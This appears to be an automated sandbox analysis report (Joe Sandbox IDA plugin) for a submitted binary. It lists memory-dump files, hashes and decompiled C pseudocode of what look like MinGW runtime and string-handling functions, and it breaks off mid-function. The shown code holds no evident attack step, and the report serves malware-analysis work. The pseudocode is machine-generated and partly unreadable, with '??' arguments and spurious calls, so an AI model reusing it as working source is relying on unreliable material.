Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: df266bd4b21f79efc540ffbb124f42c1dfd87286c8fe901913107719511dcf21
Instruction ID: 47318ae9d4778ef3c59674f1370f6909611e7901d3d4fe152c32b3ee46245513
Opcode Fuzzy Hash: df266bd4b21f79efc540ffbb124f42c1dfd87286c8fe901913107719511dcf21
Instruction Fuzzy Hash: 77E0867280821ACACA20DF2CD0416BDF7E59A5515CF84454BD5DAA7505D234DA4BCB47

Uniqueness

Uniqueness Score: -1.00%

Function 013E58C0 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 43fileCOMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,?,?,014746C0,?,?,?,?,?,?,01477ADF), ref: 0147883C
abort.MSVCRT(?,?,?,?,?,?,014746C0,?,?,?,?,?,?,01477ADF), ref: 01478849
fwrite.MSVCRT ref: 0147888B
fputs.MSVCRT ref: 014788A0
fputc.MSVCRT ref: 014788B9
abort.MSVCRT(?,?,?,?,?,?,014746C0,?,?,?,?,?,?,01477ADF), ref: 014788C3
free.MSVCRT(?,?,?,?,?,?,014746C0,?,?,?,?,?,?,01477ADF), ref: 014788CB

Strings

what(): , xrefs: 01478884

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort$fputcfputsfreefwrite
String ID: what():
API String ID: 3364258748-593870882
Opcode ID: ea86d743976ef690351bdc77524a5307598e0843ad550f493c516fb51bb62777
Instruction ID: ad38181793a10c5074c9e54a06a2adec318e503dacfb0fdc4adda29582e2d635
Opcode Fuzzy Hash: ea86d743976ef690351bdc77524a5307598e0843ad550f493c516fb51bb62777
Instruction Fuzzy Hash: 9601ACB09083169ED7017FB9D08C66DBAE0BF69359F83491ED0C5E72A1DB7885849B23

Uniqueness

Uniqueness Score: -1.00%

Function 013E3C1C Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 31libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 013E3C30
GetProcAddress.KERNEL32 ref: 013E3C4A
LoadLibraryW.KERNEL32 ref: 013E3C6A
GetProcAddress.KERNEL32 ref: 013E3C7E

Strings

SystemFunction036, xrefs: 013E3C73
rand_s, xrefs: 013E3C3F
advapi32.dll, xrefs: 013E3C63
msvcrt.dll, xrefs: 013E3C29

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
API String ID: 384173800-4041758303
Opcode ID: 0546c041123e72c3043eb04a33ed7594c94e06716ad29940becf8ce3b886180f
Instruction ID: de429a89712ffb88e45ede6934c937bf0d75a1903dba14fa248b033d91a128e9
Opcode Fuzzy Hash: 0546c041123e72c3043eb04a33ed7594c94e06716ad29940becf8ce3b886180f
Instruction Fuzzy Hash: 57F049B58093149BCB10BF7DA98801ABFE4FB48214F42492EE9C597398E334D468CB93

Uniqueness

Uniqueness Score: -1.00%

Function 01462400 Relevance: 13.7, APIs: 8, Strings: 1, Instructions: 224COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 0146249D
memcpy.MSVCRT ref: 014624C8
memmove.MSVCRT ref: 01462517
memmove.MSVCRT ref: 0146254D
memcpy.MSVCRT ref: 01462598

Strings

basic_string::_M_replace, xrefs: 014626F6

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: memmove$memcpy
String ID: basic_string::_M_replace
API String ID: 3033661859-2323331477
Opcode ID: 6a835e3adf1d250935520d5d0241f78a28ec1c0702e832f733f51c96c88aced4
Instruction ID: 645aff6afa8ad4624c3bc98c5124317cf7db54fd091c6f05666f630532e60872
Opcode Fuzzy Hash: 6a835e3adf1d250935520d5d0241f78a28ec1c0702e832f733f51c96c88aced4
Instruction Fuzzy Hash: E2812870A08352AFC315DF2CD19092ABFF5AFDA248F14892EE5D987361D271D885CB63

Uniqueness

Uniqueness Score: -1.00%

Function 013DAE90 Relevance: 13.7, APIs: 9, Instructions: 182
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 32%

			E013DAE90(void* __ecx, intOrPtr _a4, intOrPtr* _a8, signed int _a16, signed int _a20) {
				void* _v16;
				char _v32;
				intOrPtr _v48;
				void* _v64;
				struct _SECURITY_ATTRIBUTES* _v68;
				signed int _v72;
				char* _v116;
				signed int __ebp;
				signed int _t36;
				signed int _t37;
				signed char _t39;
				signed int _t40;
				signed char _t43;
				struct HINSTANCE__* _t47;
				_Unknown_base(*)()* _t48;
				struct HINSTANCE__* _t51;
				_Unknown_base(*)()* _t52;
				signed int _t58;
				signed int _t60;
				CHAR* _t63;
				struct HINSTANCE__* _t64;
				signed int _t66;
				signed int _t69;
				void* _t70;
				intOrPtr _t71;
				intOrPtr _t72;
				signed int* _t74;
				signed int _t77;
				intOrPtr* _t78;
				intOrPtr _t80;
				_Unknown_base(*)()* _t81;
				char* _t82;
				signed int _t83;
				signed int _t84;
				void* _t86;
				void** _t87;
				char** _t89;
				char** _t90;
				struct HINSTANCE__** _t92;
				struct HINSTANCE__** _t93;

				_t87 = _t86 - 0x3c;
				_t36 =  *0x14a31d0; // 0x2
				_t80 = _a4;
				_t78 = _a8;
				if(_t36 != 0) {
					__eax =  *0x14a31dc; // 0x1
					__eflags = __eax;
					if(__eflags == 0) {
						asm("lock add dword [0x14a31e0], 0x1");
						if(__eflags != 0) {
							__eax =  *0x14a31dc; // 0x1
							__eflags = __eax;
							if(__eax == 0) {
								do {
									Sleep(0);
									__ebp =  *0x14a31dc; // 0x1
									__esp = __esp - 4;
									__eflags = __ebp;
								} while (__ebp == 0);
							}
						} else {
							 *0x14f20c8 = 0xffffffff;
							__eax = CreateSemaphoreW(0, 0, 0xffff, 0);
							 *0x14a31dc = 1;
							 *0x14f20cc = __eax;
							__esp = __esp - 0x10;
						}
						__ecx =  *0x14a31d0; // 0x2
						__eflags = __ecx;
						if(__eflags != 0) {
							goto L8;
						}
					} else {
						L8:
						asm("lock add dword [0x14f20c8], 0x1");
						if(__eflags != 0) {
							__eax =  *0x14f20cc;
							__eax = WaitForSingleObject( *0x14f20cc, 0xffffffff);
							__esp = __esp - 8;
							__eflags = __eax;
							if(__eax != 0) {
								asm("lock sub dword [0x14f20c8], 0x1");
							}
						}
					}
				}
				_t83 =  *0x14f20d0;
				__eflags = _t83;
				if(_t83 != 0) {
					while(1) {
						__eflags = _t80 -  *_t83;
						if(_t80 >=  *_t83) {
							break;
						}
						_t83 = _a20;
						__eflags = _t83;
						if(_t83 == 0) {
							goto L24;
						} else {
							continue;
						}
						goto L58;
					}
					_t60 = E013D9E00(_t83, _t80);
					_t63 = _t60;
					__eflags = _t60;
					if(_t60 == 0) {
						goto L24;
					} else {
						_t77 =  *0x14a31d0; // 0x2
						__eflags = _t77;
						if(__eflags != 0) {
							asm("lock sub dword [0x14f20c8], 0x1");
							if(__eflags >= 0) {
								_v68 = 0;
								_v72 = 1;
								 *_t87 =  *0x14f20cc;
								ReleaseSemaphore(??, ??, ??);
								_t87 = _t87 - 0xc;
							}
						}
						goto L15;
					}
				} else {
					while(1) {
						L24:
						_t84 =  *0x14f20d4;
						__eflags = _t84;
						if(_t84 == 0) {
							break;
						}
						 *0x14f20d4 = _a20;
						_t63 = E013D9E00(_t84, _t80);
						_t58 =  *0x14f20d0;
						__eflags = _t58;
						if(_t58 == 0) {
							_t74 = 0x14f20d0;
							goto L23;
						} else {
							_t70 =  *_t84;
							while(1) {
								__eflags =  *_t58 - _t70;
								if( *_t58 < _t70) {
									break;
								}
								_t74 = _t58 + 0x14;
								_t58 =  *(_t58 + 0x14);
								__eflags = _t58;
								if(_t58 == 0) {
									L23:
									_a20 = _t58;
									 *_t74 = _t84;
									__eflags = _t63;
									if(_t63 == 0) {
										goto L24;
									}
								} else {
									continue;
								}
								goto L32;
							}
							_a20 = _t58;
							 *_t74 = _t84;
							__eflags = _t63;
							if(_t63 == 0) {
								continue;
							} else {
							}
						}
						L32:
						_t37 =  *0x14a31d0; // 0x2
						__eflags = _t37;
						if(__eflags != 0) {
							asm("lock sub dword [0x14f20c8], 0x1");
							if(__eflags >= 0) {
								_v68 = 0;
								_v72 = 1;
								 *_t87 =  *0x14f20cc;
								ReleaseSemaphore(??, ??, ??);
								_t87 = _t87 - 0xc;
							}
						}
						__eflags = _t63;
						if(_t63 != 0) {
							L15:
							_t80 = _a4;
							_t71 = _a8;
							_t39 = (_a16 & 0x0000ffff) >> 3;
							 *_t78 = _t80;
							_t66 = _t39;
							 *((intOrPtr*)(_t78 + 4)) = _t71;
							_t40 = _t39 & 0x000000ff;
							__eflags = _a16 & 0x00000004;
							if((_a16 & 0x00000004) != 0) {
								_t26 =  &(_t63[4]); // 0x4
								_v48 = _t71;
								_t43 = E013D91E0(_t26 - _t63[4]);
								_t72 = _v48;
								_t66 = _t43;
								_t40 = _t43 & 0x000000ff;
							}
							_t15 =  &(_t63[8]); // 0x8
							_t82 = _t15;
							__eflags = _t66 - 0xff;
							if(_t66 == 0xff) {
								L36:
								_t72 = 0;
								goto L20;
							} else {
								_t69 = _t66 & 0x00000070;
								__eflags = _t69 - 0x20;
								if(__eflags == 0) {
									_t72 = _t80;
									goto L20;
								} else {
									if(__eflags <= 0) {
										goto L36;
									} else {
										__eflags = _t69 - 0x30;
										if(_t69 != 0x30) {
											__eflags = _t69 - 0x50;
											if(_t69 != 0x50) {
												abort();
												abort();
												abort();
												abort();
												_push(_t82);
												_push(_t78);
												_push(_t80);
												_t89 = _t87 - 0x1c;
												 *_t89 = "libgcc_s_dw2-1.dll";
												_t47 = GetModuleHandleA(_t63);
												_t90 = _t89 - 4;
												if(_t47 == 0) {
													_t48 = 0x13dae40;
													_t81 = E013DA660;
												} else {
													_t64 = _t47;
													 *_t90 = "libgcc_s_dw2-1.dll";
													_t51 = LoadLibraryA(??);
													_t92 = _t90 - 4;
													 *0x14f2020 = _t51;
													_v116 = "__register_frame_info";
													 *_t92 = _t64;
													_t52 = GetProcAddress(??, ??);
													_t93 = _t92 - 8;
													_t81 = _t52;
													_v116 = "__deregister_frame_info";
													 *_t93 = _t64;
													_t48 = GetProcAddress(??, ??);
													_t90 = _t93 - 8;
												}
												 *0x1481004 = _t48;
												if(_t81 != 0) {
													_v116 = 0x14f2024;
													 *_t90 = 0x14b3104;
													 *_t81();
												}
												 *_t90 = E013C1560;
												return E013C14A0();
											} else {
												goto L36;
											}
										} else {
											L20:
											 *_t87 =  &_v32;
											E013D9050(_t40, _t82, _t72);
											 *((intOrPtr*)(_t78 + 8)) = _v32;
											goto L21;
										}
									}
								}
							}
						} else {
							L21:
							return _t63;
						}
						goto L58;
					}
					_t63 = 0;
					__eflags = 0;
					goto L32;
				}
				L58:
			}

0x013dae94
0x013dae97
0x013dae9c
0x013daea0
0x013daea6
0x013daea8
0x013daead
0x013daeaf
0x013db04b
0x013db053
0x013db0e5
0x013db0f0
0x013db0f2
0x013db0f8
0x013db0ff
0x013db101
0x013db107
0x013db10a
0x013db10a
0x013db10e
0x013db059
0x013db059
0x013db082
0x013db088
0x013db092
0x013db097
0x013db097
0x013db09a
0x013db0a0
0x013db0a2
0x00000000
0x013db0a8
0x013daeb5
0x013daeb5
0x013daeb5
0x013daebd
0x013db0b7
0x013db0c7
0x013db0cd
0x013db0d0
0x013db0d2
0x013db0d8
0x013db0d8
0x013db0d2
0x013daebd
0x013daeaf
0x013daec3
0x013daec9
0x013daecb
0x013daee3
0x013daee3
0x013daee6
0x00000000
0x00000000
0x013daed8
0x013daedb
0x013daedd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013daedd
0x013daeec
0x013daef1
0x013daef3
0x013daef5
0x00000000
0x013daefb
0x013daefb
0x013daf01
0x013daf03
0x013db110
0x013db118
0x013db123
0x013db12b
0x013db133
0x013db136
0x013db13c
0x013db13c
0x013db118
0x00000000
0x013daf03
0x013daecd
0x013daf89
0x013daf89
0x013daf89
0x013daf8f
0x013daf91
0x00000000
0x00000000
0x013daf98
0x013dafa4
0x013dafa6
0x013dafab
0x013dafad
0x013daf71
0x00000000
0x013dafaf
0x013dafaf
0x013dafca
0x013dafca
0x013dafcc
0x00000000
0x00000000
0x013dafc0
0x013dafc3
0x013dafc6
0x013dafc8
0x013daf80
0x013daf80
0x013daf83
0x013daf85
0x013daf87
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x013dafc8
0x013dafce
0x013dafd1
0x013dafd3
0x013dafd5
0x00000000
0x00000000
0x013dafd7
0x013dafd5
0x013dafdb
0x013dafdb
0x013dafe0
0x013dafe2
0x013db001
0x013db009
0x013db010
0x013db018
0x013db020
0x013db023
0x013db029
0x013db029
0x013db009
0x013dafe4
0x013dafe6
0x013daf09
0x013daf0d
0x013daf10
0x013daf13
0x013daf17
0x013daf19
0x013daf1b
0x013daf1e
0x013daf21
0x013daf25
0x013db02e
0x013db034
0x013db038
0x013db03d
0x013db041
0x013db043
0x013db043
0x013daf2b
0x013daf2b
0x013daf2e
0x013daf31
0x013daffa
0x013daffa
0x00000000
0x013daf37
0x013daf37
0x013daf3a
0x013daf3d
0x013db0b0
0x00000000
0x013daf43
0x013daf43
0x00000000
0x013daf49
0x013daf49
0x013daf4c
0x013daff1
0x013daff4
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x00000000
0x00000000
0x00000000
0x013daf52
0x013daf52
0x013daf56
0x013daf5b
0x013daf64
0x00000000
0x013daf64
0x013daf4c
0x013daf43
0x013daf3d
0x013dafec
0x013daf67
0x013daf70
0x013daf70
0x00000000
0x013dafe6
0x013dafd9
0x013dafd9
0x00000000
0x013dafd9
0x00000000

APIs

CreateSemaphoreW.KERNEL32 ref: 013DB082
WaitForSingleObject.KERNEL32 ref: 013DB0C7

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: CreateObjectSemaphoreSingleWait
String ID:
API String ID: 1168595426-0
Opcode ID: b0c39d7de86a52d6cd79c17f3cbecf1ec729fcce7c2da800ab90cb8eecac8ac0
Instruction ID: 8c33bc73d762655cc25ac970824a77f17cb7fe922db7f5d75a3dde429d453bab
Opcode Fuzzy Hash: b0c39d7de86a52d6cd79c17f3cbecf1ec729fcce7c2da800ab90cb8eecac8ac0
Instruction Fuzzy Hash: 2861B1B2604306CFD720DF28F98472ABBF9BB45308F41855DE91887399E774E859CB52

Uniqueness

Uniqueness Score: -1.00%

Function 013D9710 Relevance: 13.6, APIs: 9, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 22%

			E013D9710(void* __edi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v16;
				char _v20;
				char* _v84;
				signed char _t18;
				struct HINSTANCE__* _t28;
				_Unknown_base(*)()* _t29;
				struct HINSTANCE__* _t32;
				_Unknown_base(*)()* _t33;
				CHAR* _t35;
				struct HINSTANCE__* _t38;
				intOrPtr _t41;
				intOrPtr _t45;
				_Unknown_base(*)()* _t52;
				void* _t57;
				intOrPtr* _t58;
				char** _t60;
				char** _t61;
				struct HINSTANCE__** _t63;
				struct HINSTANCE__** _t64;

				_t58 = _t57 - 0x24;
				_t18 = ( *(_a4 + 0x10) & 0x0000ffff) >> 3;
				_t35 = _t18 & 0x000000ff;
				if(_t18 == 0xff) {
					L15:
					goto L11;
				} else {
					__eax = __eax & 0x00000070;
					__eflags = __al - 0x20;
					if(__eflags == 0) {
						goto L11;
					} else {
						if(__eflags <= 0) {
							goto L15;
						} else {
							__eflags = __al - 0x30;
							if(__al != 0x30) {
								__eflags = __al - 0x50;
								if(__al != 0x50) {
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									_push(_t49);
									_t60 = _t58 - 0x1c;
									 *_t60 = "libgcc_s_dw2-1.dll";
									_t28 = GetModuleHandleA(_t35);
									_t61 = _t60 - 4;
									if(_t28 == 0) {
										_t29 = 0x13dae40;
										_t52 = E013DA660;
									} else {
										_t38 = _t28;
										 *_t61 = "libgcc_s_dw2-1.dll";
										_t32 = LoadLibraryA(??);
										_t63 = _t61 - 4;
										 *0x14f2020 = _t32;
										_v84 = "__register_frame_info";
										 *_t63 = _t38;
										_t33 = GetProcAddress(??, ??);
										_t64 = _t63 - 8;
										_t52 = _t33;
										_v84 = "__deregister_frame_info";
										 *_t64 = _t38;
										_t29 = GetProcAddress(??, ??);
										_t61 = _t64 - 8;
									}
									 *0x1481004 = _t29;
									if(_t52 != 0) {
										_v84 = 0x14f2024;
										 *_t61 = 0x14b3104;
										 *_t52();
									}
									 *_t61 = E013C1560;
									return E013C14A0();
								} else {
									goto L15;
								}
							} else {
								L11:
								 *_t58 =  &_v20;
								E013D9050(_t35, _a8 + 8, 0);
								 *_t58 =  &_v16;
								E013D9050(_t35, _a12 + 8, 0);
								_t41 = _v20;
								_t45 = _v16;
								__eflags = _t45 - _t41;
								if(_t45 >= _t41) {
									__eflags = _t41 - _t45;
									asm("sbb eax, eax");
								}
								return 1;
							}
						}
					}
				}
			}

0x013d9712
0x013d971d
0x013d9721
0x013d9726
0x013d9794
0x00000000
0x013d9728
0x013d9728
0x013d972b
0x013d972d
0x00000000
0x013d972f
0x013d972f
0x00000000
0x013d9731
0x013d9731
0x013d9733
0x013d9790
0x013d9792
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x00000000
0x00000000
0x00000000
0x013d9735
0x013d9740
0x013d974d
0x013d9752
0x013d9764
0x013d9769
0x013d976e
0x013d9772
0x013d977b
0x013d977d
0x013d977f
0x013d9781
0x013d9781
0x013d9788
0x013d9788
0x013d9733
0x013d972f
0x013d972d

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6e1b9218c837dc5960530e96d80e234f2333ef21e865d977d56dd3e56c93de4
Instruction ID: fa057e6339872fdae97b1d04ace262215f28cc92816f024a7a8465f441c3a025
Opcode Fuzzy Hash: a6e1b9218c837dc5960530e96d80e234f2333ef21e865d977d56dd3e56c93de4
Instruction Fuzzy Hash: 6711C8B6A08215CFC714DE1CE4807AAF7E9EB9521CF065919E88997315D234DCC6C782

Uniqueness

Uniqueness Score: -1.00%

Function 013F0280 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 237
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E013F0280(intOrPtr* __ecx, void* __edx, void* __edi, intOrPtr* _a4) {
				void* _v16;
				char* _v32;
				intOrPtr _v36;
				char _v44;
				int _v48;
				int _v52;
				signed int _v56;
				void* __ebx;
				void* __esi;
				intOrPtr _t101;
				char _t104;
				int _t108;
				int _t112;
				char** _t114;
				int _t115;
				signed int _t117;
				signed int _t119;
				char* _t124;
				signed int _t125;
				intOrPtr _t126;
				intOrPtr _t127;
				intOrPtr* _t129;
				intOrPtr _t131;
				intOrPtr _t132;
				intOrPtr* _t134;
				intOrPtr _t137;
				int _t143;
				intOrPtr _t147;
				char** _t150;
				int _t151;
				intOrPtr _t155;
				int _t162;
				intOrPtr* _t167;
				char _t171;
				signed int _t174;
				signed int _t175;
				void* _t185;
				void* _t187;
				signed int _t191;
				intOrPtr _t195;
				intOrPtr _t197;
				intOrPtr _t199;
				char* _t202;
				char* _t204;
				char* _t205;
				void* _t206;
				signed int _t209;
				char* _t210;
				signed int _t211;
				void* _t212;
				signed int _t214;
				char* _t215;
				char* _t216;
				void* _t217;
				void* _t219;
				void* _t221;
				char* _t222;
				char** _t225;
				char** _t227;
				char** _t228;

				_t185 = __edx;
				_t101 = __ecx + 8;
				_t219 = _t221;
				_push(__edi);
				_push(_t206);
				_t167 = __ecx;
				_t222 = _t221 - 0x2c;
				 *__ecx = _t101;
				_v36 = _t101;
				 *((char*)(__ecx + 8)) = 0;
				 *(__ecx + 4) = 0;
				_t202 =  *( *_a4 + 0x10);
				_t104 =  *_t202;
				if(_t104 == 0) {
					_v48 = 0x2a;
					_v52 = 1;
					_v56 = 0;
					 *_t222 = 0;
					E01462FD0(__ecx, __ecx, _t202, _t206, _t219);
					goto L7;
				} else {
					_t171 = _t104;
					if(_t202[4] == 0) {
						L6:
						 *_t222 = _t171;
						_t108 = strlen(??);
						_v52 = _t171;
						_v48 = _t108;
						_v56 = 0;
						 *_t222 = 0;
						E01462400(_t167, _t167, _t202, _t171, _t219);
						L7:
						goto L8;
					} else {
						_v32 = _t171;
						_t209 = 0;
						while(1) {
							_t209 = _t209 + 1;
							_v56 =  *((intOrPtr*)(_t202 + _t209 * 4));
							 *_t222 = _t202[_t209 * 4 - 4];
							_t112 = strcmp(??, ??);
							if(_t112 != 0) {
								break;
							}
							if(_t209 <= 4) {
								continue;
							} else {
								_t171 = _v32;
								if(_t112 != 0) {
									break;
								} else {
									goto L6;
								}
							}
							goto L77;
						}
						 *_t222 = 0x80;
						E01464B20(_t167, _t185);
						_t114 =  *0x14ad238; // 0x14ad160
						_t225 = _t222 - 4;
						_t210 =  *_t114;
						 *_t225 = _t210;
						_t115 = strlen(??);
						_t187 = 0x3fffffff -  *(_t167 + 4);
						if(0x3fffffff < _t115) {
							L34:
							 *_t225 = "basic_string::append";
							_t211 = E014797B0(_t187, _t202);
							_t117 =  *_t167;
							if(_v36 != _t117) {
								_v56 = _t117;
								L01477910();
							}
							_v56 = _t211;
							E013D8C90(_t117, _t167, _t187, _t202, _t211);
							_t119 = _v52;
							if(_t119 !=  &_v44) {
								_v56 = _t119;
								L01477910();
							}
							_t120 = _t167;
							_t190 = _t211 + 1;
							_v56 = _t167;
							if(_t211 + 1 == 0) {
								E01477B30();
							}
							L01477A60(E013D8C90(_t120, _t167, _t190, _t202, _t211));
							E01477BA0(_t167, _t202, _t211, _t219);
							_t124 =  *(_t167 + 4);
							while(1) {
								_t211 = _t211 + 1;
								if(_t211 >=  *((intOrPtr*)(_t167 + 8))) {
									break;
								}
								_t175 =  *((intOrPtr*)(_t124 + _t211 * 4));
								if(_t175 != 0) {
									_t131 =  *0x14a31d0; // 0x2
									if(_t131 != 0) {
										_t132 = 0xffffffff;
										asm("lock xadd [ecx+0x4], eax");
									} else {
										_t132 =  *((intOrPtr*)(_t175 + 4));
										 *((intOrPtr*)(_t175 + 4)) = _t132 - 1;
									}
									if(_t132 == 1) {
										_t134 =  *((intOrPtr*)( *_t175 + 4));
										if(_t134 != 0x14610a0) {
											 *_t134();
										} else {
											_v56 = _t175;
											L01477910();
										}
									}
									_t124 =  *(_t167 + 4);
								}
							}
							if(_t124 != 0) {
								_v56 = _t124;
								L01477900();
							}
							_t125 =  *((intOrPtr*)(_t167 + 0xc));
							if(_t125 != 0) {
								if( *((intOrPtr*)(_t167 + 8)) == 0) {
									L57:
									_v56 = _t125;
									L01477900();
								} else {
									_t214 = 0;
									do {
										_t174 =  *((intOrPtr*)(_t125 + _t214 * 4));
										if(_t174 != 0) {
											_t126 =  *0x14a31d0; // 0x2
											if(_t126 != 0) {
												_t127 = 0xffffffff;
												asm("lock xadd [ecx+0x4], eax");
											} else {
												_t127 =  *((intOrPtr*)(_t174 + 4));
												 *((intOrPtr*)(_t174 + 4)) = _t127 - 1;
											}
											if(_t127 == 1) {
												_t129 =  *((intOrPtr*)( *_t174 + 4));
												if(_t129 != 0x14610a0) {
													 *_t129();
												} else {
													_v56 = _t174;
													L01477910();
												}
											}
											_t125 =  *((intOrPtr*)(_t167 + 0xc));
										}
										_t214 = _t214 + 1;
									} while (_t214 <  *((intOrPtr*)(_t167 + 8)));
									if(_t125 != 0) {
										goto L57;
									}
								}
							}
							_t191 =  *((intOrPtr*)(_t167 + 0x10));
							_t212 = 0;
							if(_t191 != 0) {
								do {
